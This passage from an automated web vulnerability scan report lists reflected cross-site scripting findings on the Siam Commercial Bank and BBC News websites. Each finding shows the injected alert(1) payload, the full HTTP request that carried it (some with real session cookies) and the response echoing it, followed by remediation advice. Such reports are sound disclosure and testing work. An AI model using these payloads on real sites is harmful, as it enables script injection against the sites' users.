5.150. http://www.scb.co.th/landing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /landing.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c3a43--><script>alert(1)</script>2ef873cd770 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /landing.htmlc3a43--><script>alert(1)</script>2ef873cd770 HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=spsstgpflpipnok67bbkcn9fl5; path=/
Expires: Wed, 03 Nov 2010 12:33:28 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 704

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/landing.htmlc3a43--><script>alert(1)</script>2ef873cd770 -->
...[SNIP]...

5.151. http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/img/api/t1new/bttn_calc.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ad655--><script>alert(1)</script>bd77d5947fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_apiad655--><script>alert(1)</script>bd77d5947fc/img/api/t1new/bttn_calc.gif HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/scb_api/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM=
Cookie: JSESSIONID=DFFDD5639AC9938E8A85EF30E5AB6808; _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 18:02:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=tv1of0k1k170498f068gjqukl5; path=/
Expires: Wed, 03 Nov 2010 18:02:36 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 727

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_apiad655--><script>alert(1)</script>bd77d5947fc/img/api/t1new/bttn_calc.gif -->
...[SNIP]...

5.152. http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/img/api/t1new/bttn_reset.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6c6f0--><script>alert(1)</script>3cbc9be325 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_api6c6f0--><script>alert(1)</script>3cbc9be325/img/api/t1new/bttn_reset.gif HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/scb_api/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM=
Cookie: JSESSIONID=DFFDD5639AC9938E8A85EF30E5AB6808; _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 18:02:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=13mptp81rs4es1d9fitvsno043; path=/
Expires: Wed, 03 Nov 2010 18:02:37 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 727

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_api6c6f0--><script>alert(1)</script>3cbc9be325/img/api/t1new/bttn_reset.gif -->
...[SNIP]...

5.153. http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4acd4--><script>alert(1)</script>aee2cdd363e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_api4acd4--><script>alert(1)</script>aee2cdd363e/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM= HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 18:02:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hp1ojivtnvl8t3t3jot1gckiv1; path=/
Expires: Wed, 03 Nov 2010 18:02:39 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 735

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_api4acd4--><script>alert(1)</script>aee2cdd363e/scbapi.jsp?key=MjAwOTEyMTUxNjA5NDM= -->
...[SNIP]...

5.154. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /stocks/media/00107f.swf

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7cbb8--><script>alert(1)</script>629dc1292c3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /stocks7cbb8--><script>alert(1)</script>629dc1292c3/media/00107f.swf HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:24:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:24:15 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 715

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/stocks7cbb8--><script>alert(1)</script>629dc1292c3/media/00107f.swf -->
...[SNIP]...

5.155. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /stocks/media/00107f.swf

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 5c7ce--><script>alert(1)</script>0e9e19f7438 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /stocks/media5c7ce--><script>alert(1)</script>0e9e19f7438/00107f.swf HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:24:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:24:17 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 715

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/stocks/media5c7ce--><script>alert(1)</script>0e9e19f7438/00107f.swf -->
...[SNIP]...

5.156. http://www.scb.co.th/stocks/media/00107f.swf [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /stocks/media/00107f.swf

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 2a498--><script>alert(1)</script>efea3a69394 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /stocks/media/00107f.swf2a498--><script>alert(1)</script>efea3a69394 HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/en/home
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 12:24:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Wed, 03 Nov 2010 12:24:19 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 715

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/stocks/media/00107f.swf2a498--><script>alert(1)</script>efea3a69394 -->
...[SNIP]...

5.157. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1637a'-alert(1)-'0ae01a55647 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=1637a'-alert(1)-'0ae01a55647

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:12 GMT
Keep-Alive: timeout=10, max=789
Expires: Tue, 03 May 2011 13:25:12 GMT
Connection: close
Set-Cookie: BBC-UID=44cdfcc010a283b8ddb0488bc14c79be89afffa7b0c051799b2b936ed8bd631a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:12 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44cdfcc010a283b8ddb0488bc14c79be89afffa7b0c051799b2b936ed8bd631a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:12 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43898

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429112000,
       editionToServe: null,
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=1637a'-alert(1)-'0ae01a55647',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/newsid_9469000/946945
...[SNIP]...

5.158. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e64d'-alert(1)-'ee4861ef742 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7e64d'-alert(1)-'ee4861ef742

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:21 GMT
Keep-Alive: timeout=10, max=786
Expires: Tue, 03 May 2011 13:25:21 GMT
Connection: close
Set-Cookie: BBC-UID=44ad6c605042841172655fa751439095a768d56f80605109db3bb3bf98e446ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:21 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44ad6c605042841172655fa751439095a768d56f80605109db3bb3bf98e446ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43898

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429121000,
       editionToServe: null,
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7e64d'-alert(1)-'ee4861ef742',
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/newsid_9469000/946945
...[SNIP]...

5.159. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cricket/13264093.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df73b'-alert(1)-'12beadca00b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cricket/13264093.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=df73b'-alert(1)-'12beadca00b

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:27 GMT
Keep-Alive: timeout=10, max=799
Expires: Tue, 03 May 2011 13:25:27 GMT
Connection: close
Set-Cookie: BBC-UID=34ddcc70a032746743544d284111ce95bb077cadd0d011ba04db5a65bda056f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34ddcc70a032746743544d284111ce95bb077cadd0d011ba04db5a65bda056f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429127000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=df73b'-alert(1)-'12beadca00b',
       section: 'sri-lanka',
       sectionPath: '/cricket',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
       uri: '/sport2/hi/cri
...[SNIP]...

5.160. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/13265403.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a276'-alert(1)-'ee3d9a5ed10 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/13265403.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7a276'-alert(1)-'ee3d9a5ed10

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:25 GMT
Keep-Alive: timeout=10, max=798
Expires: Tue, 03 May 2011 13:25:25 GMT
Connection: close
Set-Cookie: BBC-UID=f40dcc406052c4653d9c257541476fa6b32d897a9060b1099b5bb3cea0de34ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=f40dcc406052c4653d9c257541476fa6b32d897a9060b1099b5bb3cea0de34ac0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57792

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429125000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=7a276'-alert(1)-'ee3d9a5ed10',
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       uri: '/sport2/hi/footb
...[SNIP]...

5.161. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90e4d'-alert(1)-'2e1c856a6b0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=90e4d'-alert(1)-'2e1c856a6b0

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:25:23 GMT
Keep-Alive: timeout=10, max=793
Expires: Tue, 03 May 2011 13:25:23 GMT
Connection: close
Set-Cookie: BBC-UID=041d2c0060e2641338ef1a28d1fcee21bbd1d1b140a062e357dd0395366125160Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=041d2c0060e2641338ef1a28d1fcee21bbd1d1b140a062e357dd0395366125160Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:25:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429123000,
       editionToServe: 'international',
       queryString: null,
       referrer: 'http://www.google.com/search?hl=en&amp;q=90e4d'-alert(1)-'2e1c856a6b0',
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'story',
       uri: '/sport2/
...[SNIP]...

5.162. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
